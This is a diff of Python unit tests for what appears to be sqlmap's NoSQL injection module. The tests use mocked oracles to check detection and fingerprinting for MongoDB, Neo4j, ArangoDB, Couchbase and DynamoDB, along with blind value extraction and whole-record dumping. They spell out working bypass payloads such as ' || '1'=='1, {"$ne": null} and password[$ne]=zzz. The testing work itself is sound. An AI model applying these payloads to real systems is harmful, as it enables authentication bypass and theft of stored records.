+ """Content-bearing MongoDB $where shares the ' || '1'=='1 break-out with ArangoDB; _resolve() must
+ disambiguate (AQL '=~' fails, a JS /re/.test() holds) and extract via the content oracle"""
+
+ def setUp(self):
+ self._f, self._fv = ni._fetch, ni._fetchValue
+ ni._fetch = lambda *args, **kwargs: ""
+ ni._fetchValue = _jswhere
+ ni.conf.parameters = {"GET": "username=luther&password=x"}
+
+ def tearDown(self):
+ ni._fetch, ni._fetchValue = self._f, self._fv
+
+ def test_resolve_where_content(self):
+ vector = ni._resolve("GET", "password", "password")
+ self.assertEqual(vector.dbms, "MongoDB ($where)")
+ self.assertEqual(vector.bypass, "' || '1'=='1")
+
+ def test_extract(self):
+ vector = ni._resolve("GET", "password", "password")
+ self.assertEqual(ni._extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth), SECRET)
+
+
+class TestNoSqlWhereDump(unittest.TestCase):
+ """$where whole-document dump: Object.keys(this) enumeration drives name + value recovery for every
+ field (per-field char recovery itself is covered by TestNoSqlWhere)"""
+
+ DOC = [("id", "1"), ("username", "luther"), ("password", "s3cr3t"), ("role", "admin")]
+
+ def setUp(self):
+ self._orig = ni._whereField
+ names = [name for name, _ in self.DOC]
+ values = dict(self.DOC)
+
+ def fake(place, parameter, bound, expr, threshold):
+ m = re.search(r"Object\.keys\(d\)\[(\d+)\]", expr)
+ if m:
+ index = int(m.group(1))
+ return names[index] if index < len(names) else None
+ m = re.search(r"d\['([^']*)'\]", expr)
+ if m:
+ return values.get(m.group(1))
+ return None
+
+ ni._whereField = fake
+
+ def tearDown(self):
+ ni._whereField = self._orig
+
+ def test_dump(self):
+ columns, rows = ni._whereDump("GET", "password", "", 0)
+ self.assertEqual(columns, ["id", "username", "password", "role"])
+ self.assertEqual(rows, [["1", "luther", "s3cr3t", "admin"]])
+
+ def test_empty_document(self):
+ ni._whereField = lambda *args, **kwargs: None
+ self.assertIsNone(ni._whereDump("GET", "password", "", 0))
+
+
+class TestNoSqlEnumDump(unittest.TestCase):
+ """Content-based whole-document dump (e.g. Neo4j keys(u)): enumerate field names then values"""
+
+ DOC = [("id", "1"), ("username", "luther"), ("password", "s3cr3t"), ("role", "admin")]
+
+ def setUp(self):
+ self._ef, self._fv = ni._enumField, ni._fetchValue
+ ni._fetchValue = lambda *args, **kwargs: "Welcome" # non-error single-record template
+ names = [name for name, _ in self.DOC]
+ values = dict(self.DOC)
+
+ def fake(place, parameter, template, payloadFor):
+ probe = payloadFor("X") # render to inspect the target expression
+ m = re.search(r"\(u\)\[(\d+)\]", probe) # keys/ATTRIBUTES/OBJECT_NAMES(u)[i]
+ if m:
+ index = int(m.group(1))
+ return names[index] if index < len(names) else None
+ m = re.search(r"u\['([^']*)'\]", probe) # toString/TO_STRING/TOSTRING(u['name'])
+ if m:
+ return values.get(m.group(1))
+ return None
+
+ ni._enumField = fake
+
+ def tearDown(self):
+ ni._enumField, ni._fetchValue = self._ef, self._fv
+
+ def _check(self, keysExpr, valueExpr):
+ makePayload = lambda expr, rb: "X' OR %s =~ '^%s.*" % (expr, rb)
+ columns, rows = ni._enumDump("GET", "password", makePayload, keysExpr, valueExpr)
+ self.assertEqual(columns, ["id", "username", "password", "role"])
+ self.assertEqual(rows, [["1", "luther", "s3cr3t", "admin"]])
+
+ def test_cypher(self):
+ self._check(lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % ni._propLiteral(n))
+
+ def test_aql(self):
+ self._check(lambda i: "ATTRIBUTES(u)[%d]" % i, lambda n: "TO_STRING(u[%s])" % ni._propLiteral(n))
+
+ def test_n1ql(self):
+ self._check(lambda i: "OBJECT_NAMES(u)[%d]" % i, lambda n: "TOSTRING(u[%s])" % ni._propLiteral(n))
+
+
+class TestNoSqlBypass(unittest.TestCase):
+ """Confirmed injection must surface the always-true (authentication/filter bypass) payload"""
+
+ def setUp(self):
+ self._f = ni._fetch
+ ni._fetch = _mongo
+
+ def tearDown(self):
+ ni._fetch = self._f
+
+ def test_mongo_bypass(self):
+ vector = ni._resolve("GET", "password", "password")
+ self.assertEqual(vector.dbms, "MongoDB")
+ self.assertEqual(vector.bypass, '{"$ne": null}')
+
+
+class TestNoSqlInband(unittest.TestCase):
+ """In-band exposure gate: _inband() returns the always-true response only when it carries
+ materially more reflected content than the original request"""
+
+ def setUp(self):
+ self._fv = ni._fetchValue
+ ni.conf.parameters = {"GET": "id=1"}
+
+ def tearDown(self):
+ ni._fetchValue = self._fv
+
+ def test_exposure_detected(self):
+ ni._fetchValue = lambda place, parameter, value: "" # original (one row)
+ template = ""
+ self.assertEqual(ni._inband("GET", "id", template), template)
+
+ def test_no_exposure_when_not_larger(self):
+ ni._fetchValue = lambda place, parameter, value: "X" * 200 # original (large)
+ self.assertIsNone(ni._inband("GET", "id", "Welcome")) # always-true smaller -> no dump
+
+
+class TestNoSqlRecords(unittest.TestCase):
+ """Reflected responses are parsed into (columns, rows) for a regular table dump"""
+
+ def test_html_table_without_header(self):
+ page = ("Results:"
+ "| 1 | luther | blisset | "
+ "| 2 | fluffy | bunny | ")
+ columns, rows = ni._records(page)
+ self.assertEqual(columns, ["column_1", "column_2", "column_3"])
+ self.assertEqual(rows, [["1", "luther", "blisset"], ["2", "fluffy", "bunny"]])
+
+ def test_html_table_with_header(self):
+ page = ""
+ columns, rows = ni._records(page)
+ self.assertEqual(columns, ["id", "user"])
+ self.assertEqual(rows, [["1", "luther"]])
+
+ def test_json_array_of_objects(self):
+ page = '{"results": [{"id": 1, "username": "luther", "password": null}, {"id": 2, "username": "fluffy"}]}'
+ columns, rows = ni._records(page)
+ self.assertEqual(columns, ["id", "username", "password"])
+ self.assertEqual(rows, [["1", "luther", "NULL"], ["2", "fluffy", ""]])
+
+ def test_unstructured_returns_none(self):
+ self.assertIsNone(ni._records("just some prose, no records here"))
+
+
+def _numeric(place, parameter, value):
+ # numeric-context oracle: 'OR 1=1' is always-true (rows), 'AND 1=2' is false (no rows)
+ if "OR 1=1" in value:
+ return MATCH
+ if "AND 1=2" in value:
+ return NOMATCH
+ return MATCH if value == "1" else NOMATCH
+
+
+class TestNoSqlNumeric(unittest.TestCase):
+ """Numeric-context (unquoted) break-out, e.g. 'WHERE id = ': detected via OR/AND, with the
+ always-true response carried as the in-band dump template"""
+
+ def setUp(self):
+ self._f, self._fv = ni._fetch, ni._fetchValue
+ ni._fetch = lambda *args, **kwargs: ""
+ ni._fetchValue = _numeric
+ ni.conf.parameters = {"GET": "id=1"}
+ ni.conf.paramDict = {"GET": {"id": "1"}}
+
+ def tearDown(self):
+ ni._fetch, ni._fetchValue = self._f, self._fv
+
+ def test_resolve_numeric(self):
+ vector = ni._resolve("GET", "id", "id")
+ self.assertEqual(vector.dbms, "Neo4j")
+ self.assertEqual(vector.bypass, "1 OR 1=1")
+ self.assertIsNone(vector.lengthValue) # numeric field -> in-band only, no blind extraction
+
+ def test_skips_non_numeric(self):
+ ni.conf.parameters = {"GET": "name=luther"}
+ self.assertIsNone(ni._detectNumeric("GET", "name")) # only applies to a numeric field value
+
+
+def _numericN1ql(place, parameter, value):
+ # numeric-context Couchbase: OR/AND boolean plus the N1QL-only REGEXP_CONTAINS discriminator
+ m = re.search(r"REGEXP_CONTAINS\('ab', '([^']*)'\)", value)
+ if m:
+ return MATCH if re.search(m.group(1), "ab") is not None else NOMATCH
+ if "OR 1=1" in value:
+ return MATCH
+ if "AND 1=2" in value:
+ return NOMATCH
+ return MATCH if value == "1" else NOMATCH
+
+
+class TestNoSqlNumericN1QL(unittest.TestCase):
+ """A numeric Couchbase point is disambiguated from Neo4j by the N1QL-only REGEXP_CONTAINS probe"""
+
+ def setUp(self):
+ self._f, self._fv = ni._fetch, ni._fetchValue
+ ni._fetch = lambda *args, **kwargs: ""
+ ni._fetchValue = _numericN1ql
+ ni.conf.parameters = {"GET": "id=1"}
+
+ def tearDown(self):
+ ni._fetch, ni._fetchValue = self._f, self._fv
+
+ def test_resolve_numeric_couchbase(self):
+ dbms, _, bypass = ni._detectNumeric("GET", "id")
+ self.assertEqual(dbms, "Couchbase")
+ self.assertEqual(bypass, "1 OR 1=1")
+
+
+def _numericAql(place, parameter, value):
+ # numeric-context ArangoDB: only the ||/&& family diverges (OR/AND and REGEXP_CONTAINS do not)
+ return MATCH if "|| 1==1" in value else NOMATCH
+
+
+class TestNoSqlNumericAQL(unittest.TestCase):
+ """A numeric ArangoDB point is detected via the ||/&& family once OR/AND yields no divergence"""
+
+ def setUp(self):
+ self._f, self._fv = ni._fetch, ni._fetchValue
+ ni._fetch = lambda *args, **kwargs: ""
+ ni._fetchValue = _numericAql
+ ni.conf.parameters = {"GET": "id=1"}
+
+ def tearDown(self):
+ ni._fetch, ni._fetchValue = self._f, self._fv
+
+ def test_resolve_numeric_arango(self):
+ dbms, _, bypass = ni._detectNumeric("GET", "id")
+ self.assertEqual(dbms, "ArangoDB")
+ self.assertEqual(bypass, "1 || 1==1")
+
+
+def _partiql(place, parameter, value):
+ # DynamoDB PartiQL string-context oracle: 'field >= prefix' matches the bound record iff
+ # SECRET >= prefix (ordered comparison, the basis of the comparison-bisection extraction);
+ # 'begins_with(field, prefix)' matches iff SECRET starts with prefix
+ m = re.search(r">= '(.*)$", value)
+ if m:
+ return MATCH if SECRET >= m.group(1).replace("''", "'") else NOMATCH
+ m = re.search(r"begins_with\([^,]+, '(.*?)'\) OR '1'='2", value)
+ if m:
+ return MATCH if SECRET.startswith(m.group(1)) else NOMATCH
+ return NOMATCH
+
+
+class TestNoSqlPartiQL(unittest.TestCase):
+ """DynamoDB PartiQL: no regexp engine, so a value is recovered by ordered string comparison
+ (field >= 'prefix') bisected over the printable-ASCII range"""
+
+ def setUp(self):
+ self._fv = ni._fetchValue
+ ni._fetchValue = _partiql
+ ni.conf.parameters = {"GET": "username=luther&password=x"}
+ ni.conf.paramDict = {"GET": {"password": "x"}}
+
+ def tearDown(self):
+ ni._fetchValue = self._fv
+
+ def test_extract(self):
+ value = ni._partiqlValue("GET", "password", "", "password")
+ self.assertEqual(value, SECRET)
+
+ def test_dump_binds_sibling(self):
+ columns, rows = ni._partiqlDump("GET", "password", "password")
+ self.assertEqual(columns, ["password"])
+ self.assertEqual(rows, [[SECRET]])
+
+ def test_dump_without_sibling_returns_none(self):
+ ni.conf.parameters = {"GET": "password=x"} # no sibling to pin a single record
+ ni.conf.paramDict = {"GET": {"password": "x"}}
+ self.assertIsNone(ni._partiqlDump("GET", "password", "password"))
+
+
+def _numericDdb(place, parameter, value):
+ # numeric-context DynamoDB: OR/AND boolean plus the PartiQL-only begins_with discriminator
+ m = re.search(r"begins_with\('ab', '([^']*)'\)", value)
+ if m:
+ return MATCH if "ab".startswith(m.group(1)) else NOMATCH
+ if "OR 1=1" in value:
+ return MATCH
+ if "AND 1=2" in value:
+ return NOMATCH
+ return MATCH if value == "1" else NOMATCH
+
+
+class TestNoSqlNumericDynamoDB(unittest.TestCase):
+ """A numeric DynamoDB point is disambiguated from Neo4j/Couchbase by the PartiQL-only begins_with probe"""
+
+ def setUp(self):
+ self._f, self._fv = ni._fetch, ni._fetchValue
+ ni._fetch = lambda *args, **kwargs: ""
+ ni._fetchValue = _numericDdb
+ ni.conf.parameters = {"GET": "id=1"}
+
+ def tearDown(self):
+ ni._fetch, ni._fetchValue = self._f, self._fv
+
+ def test_resolve_numeric_dynamodb(self):
+ dbms, _, bypass = ni._detectNumeric("GET", "id")
+ self.assertEqual(dbms, "DynamoDB")
+ self.assertEqual(bypass, "1 OR 1=1")
+
+
+class TestNoSqlCookiePlace(unittest.TestCase):
+ """Cookie place: parameters split/join on ';' (not '&') and the segment routes to the Cookie header"""
+
+ def setUp(self):
+ ni.conf.cookieDel = None
+ ni.conf.parameters = {ni.PLACE.COOKIE: "session=abc; username=luther; password=x"}
+ ni.conf.paramDict = {ni.PLACE.COOKIE: {"password": "x"}}
+
+ def test_delimiter(self):
+ self.assertEqual(ni._delim(ni.PLACE.COOKIE), ";")
+ self.assertEqual(ni._delim(ni.PLACE.GET), "&")
+
+ def test_original_value(self):
+ self.assertEqual(ni._originalValue(ni.PLACE.COOKIE, "username").strip(), "luther")
+
+ def test_replace_segment(self):
+ out = ni._replaceSegment(ni.PLACE.COOKIE, "password", "password[$ne]=zzz")
+ self.assertIn("session=abc", out)
+ self.assertIn("username=luther", out)
+ self.assertIn("password[$ne]=zzz", out)
+ self.assertEqual(out.count(";"), 2) # 3 segments -> 2 delimiters (no '&')
+ self.assertNotIn("&", out)
+
+ def test_constraint_binds_siblings(self):
+ constraint = ni._constraint(ni.PLACE.COOKIE, "password")
+ self.assertIn("u.session='abc'", constraint)
+ self.assertIn("u.username='luther'", constraint)
+
+
+class TestNoSqlErrorRegex(unittest.TestCase):
+ """The heuristic regex must match real back-end error structures, not bare product names (so an
+ article merely mentioning MongoDB/Elasticsearch/Cassandra is never flagged as injectable)"""
+
+ from lib.core.settings import NOSQL_ERROR_REGEX
+
+ POSITIVES = (
+ 'MongoServerError: unknown operator: $foo',
+ '{"ok":0,"errmsg":"unknown top level operator: $where","code":2,"codeName":"BadValue"}',
+ 'MongoServerError: Regular expression is invalid: missing )',
+ 'CastError: Cast to ObjectId failed',
+ '{"error":"query_parse_error","reason":"Invalid operator: $foo"}',
+ '{"error":{"root_cause":[{"type":"query_shard_exception","reason":"Failed to parse query [luther\']"}]},"status":400}',
+ '{"type":"x_content_parse_exception","reason":"[1:18] [bool] failed to parse"}',
+ '{"error":{"msg":"org.apache.solr.search.SyntaxError: Cannot parse \'username:\'","code":400}}',
+ "Neo.ClientError.Statement.SyntaxError: Invalid input",
+ 'Neo4j error: Failed to parse string literal. The query must contain an even number of non-escaped quotes. (line 1, column 30) "MATCH (u:User) WHERE u.id = 1"',
+ "Neo4j error: Invalid input ''x'': expected an expression, 'FOREACH', 'MATCH', 'MERGE', 'UNWIND', 'WITH' or ",
+ '{"error":true,"errorNum":1501,"errorMessage":"AQL: syntax error, unexpected quoted string"}',
+ "ResponseError: line 1:38 no viable alternative at input",
+ "SyntaxException: line 1:42 mismatched input ''' expecting EOF",
+ '{"error":{"root_cause":[{"type":"number_format_exception","reason":"For input string"}]},"status":400}',
+ 'ReplyError: WRONGTYPE Operation against a key holding the wrong kind of value',
+ 'ReplyError: ERR Error compiling script (new function): user_script:1: unexpected symbol',
+ 'CLIENT_ERROR bad command line format',
+ 'error parsing query: found WHERE, expected identifier at line 1',
+ 'org.apache.phoenix.exception.PhoenixIOException: failed',
+ )
+
+ NEGATIVES = (
+ "This article explains how MongoDB, CouchDB and Elasticsearch handle queries.",
+ "Cassandra and Redis are popular NoSQL databases; Neo4j is a graph database.",
+ "We migrated from Solr to OpenSearch last year. ArangoDB is multi-model.",
+ "Results:",
+ "Invalid credentials",
+ )
+
+ def test_matches_real_errors(self):
+ for sample in self.POSITIVES:
+ self.assertIsNotNone(re.search(self.NOSQL_ERROR_REGEX, sample), "should match: %s" % sample)
+
+ def test_ignores_benign_text(self):
+ for sample in self.NEGATIVES:
+ self.assertIsNone(re.search(self.NOSQL_ERROR_REGEX, sample), "should NOT match: %s" % sample)
+
+
+if __name__ == "__main__":
+ unittest.main()
+
|